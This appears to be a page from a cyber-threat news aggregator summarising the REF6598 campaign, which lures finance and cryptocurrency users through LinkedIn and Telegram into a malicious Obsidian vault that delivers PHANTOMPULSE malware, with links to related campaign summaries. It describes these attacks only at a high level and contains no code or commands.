Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

REF6598 Obsidian social-engineering campaign targeting finance and crypto users

Campaign
First reported
Last updated
Happening score
H score 39
1 unique sources, 1 articles

Summary

Hide ▲

The REF6598 operation is using LinkedIn, Telegram, and Obsidian to deliver PHANTOMPULSE, creating a targeted intrusion path into financial and cryptocurrency users across Windows and macOS. Targets are approached as if by a venture capital firm, then moved into a Telegram group that adds false legitimacy and steers them toward a shared cloud vault. Once victims enable Installed community plugins, the malicious vault configuration can execute code through Shell Commands and hide interface elements with Hider. The campaign matters because it turns a trusted note-taking app into an access channel for malware delivery and remote control without relying on a traditional software exploit.

Related Happenings

UNC1069 open-source maintainer social-engineering campaign

Campaign
First: 04.04.2026 23:30 Last: 04.04.2026 23:30 Sources 1

About this happening: UNC1069's **coordinated social-engineering campaign** against **Node.js and npm maintainers** has widened, with multiple developers reporting the same lure pattern and the potenti...

Latest development: 06.04.2026 23:55

Security researcher Taylor Monahan and Socket reported that members of the open source software community, including Socket engineers and CEO Feross Aboukhadijeh, were targeted by the same slow-burn LinkedIn, Slack, and Microsoft Teams social engineering playbook used against Axios maintainer Jason Saayman, indicating the campaign was wider than a single Axios compromise.

Open Happening

Storm infostealer server-side decryption activity

Malware Activity
First: 02.04.2026 17:15 Last: 02.04.2026 17:15 Sources 1

About this happening: The **Storm** infostealer now steals **browser credentials**, **session cookies**, and **crypto wallets** and forwards them to attacker infrastructure for **server-side decryption...

Open Happening

VenomStealer ecosystem shift changes threat-actor operations

Threat Actor Meta
First: 31.03.2026 17:51 Last: 31.03.2026 17:51 Sources 1

About this happening: **VenomStealer** is being run as a **licensed underground service** with an **affiliate program**, shifting it from a single malware kit into a repeatable operator ecosystem that...

Open Happening

Ghost campaign remote access trojan payload

Malware Activity
First: 24.03.2026 16:30 Last: 24.03.2026 16:30 Sources 1

About this happening: A malicious **npm** payload tied to the **Ghost campaign** began in **early February** and used **fake installation logs** to hide a **remote access trojan (RAT)** that could stea...

Open Happening

Contagious Interview cryptocurrency social-engineering and malware-delivery campaign

Campaign
First: 23.03.2026 20:09 Last: 23.03.2026 20:09 Sources 1

About this happening: A **North Korean** cluster behind **Contagious Interview / WaterPlum** is running a coordinated **malware campaign** against **cryptocurrency professionals**, increasing the risk...

Open Happening

Timeline

  1. 16.04.2026 14:02 2 articles · 1mo ago

    REF6598 Obsidian social engineering campaign disclosed

    Initial Disclosure

    Elastic Security Labs disclosed REF6598, a social engineering campaign targeting individuals in the financial and cryptocurrency sectors through LinkedIn and Telegram. The operation steers victims to a cloud-hosted Obsidian vault, where enabling Installed community plugins lets malicious configuration trigger the Shell Commands and Hider plugins; on Windows it drops PHANTOMPULL and loads PHANTOMPULSE in memory, while on macOS it uses an obfuscated AppleScript dropper with Telegram-based fallback C2 resolution. The intrusion was detected and blocked before the operators achieved their goals.

    Show sources
    Open in new tab